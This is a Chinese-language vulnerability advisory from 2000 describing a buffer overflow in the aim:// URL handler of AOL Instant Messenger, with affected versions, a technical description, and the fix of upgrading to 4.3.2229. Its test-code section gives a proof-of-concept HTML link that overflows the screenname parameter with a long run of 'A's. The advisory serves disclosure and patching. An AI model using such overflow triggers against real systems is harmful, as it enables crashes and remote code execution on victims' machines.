AOL Instant Messenger存在缓冲溢出漏洞

发布时间：2000-12-19
更新时间：2000-12-19
严重程度：中
威胁程度：远程拒绝服务
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

AOL Instant Messenger 4.2.1193
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 2000
AOL Instant Messenger 4.1.2010
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 2000
AOL Instant Messenger 4.0
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows CE 3.0
   - Apple MacOS 9.0
AOL Instant Messenger 3.5.1856
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 2000

其中下面的系统不存在问题：
AOL Instant Messenger 4.3.2229
   + Microsoft Windows 98
   + Microsoft Windows 95
   + Microsoft Windows NT 4.0
   + Microsoft Windows NT 2000
   + Microsoft Windows CE 2.0

详细描述
AOL是一个实时信息服务系统，当AOL安装好的时候，其有一个默认配置就是URL
协议连接到AIM客户端:aim://，其中在aim:// URL参数端存在缓冲溢出。通过发送特殊的URL，使用aim:协议和有破坏性的'goim'和'screenname'参数，就可能导致远程用户在内存拷贝操作时缓冲溢出并执行任意代码。如果目标系统中安装了AIM，即使AIM没有运行，用户还可以激活aim:// URL，造成系统出现问题。

测试代码
href="aim:goim? screenname=AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA&message=EIP,+the+other+white+meat" >here</a><br>

解决方案
这个漏洞在AIM 4.3.2229中已经修补：

http://www.aol.com/aim/download.html

相关信息

最近严重漏洞

AOL Instant Messenger存在缓冲溢出漏洞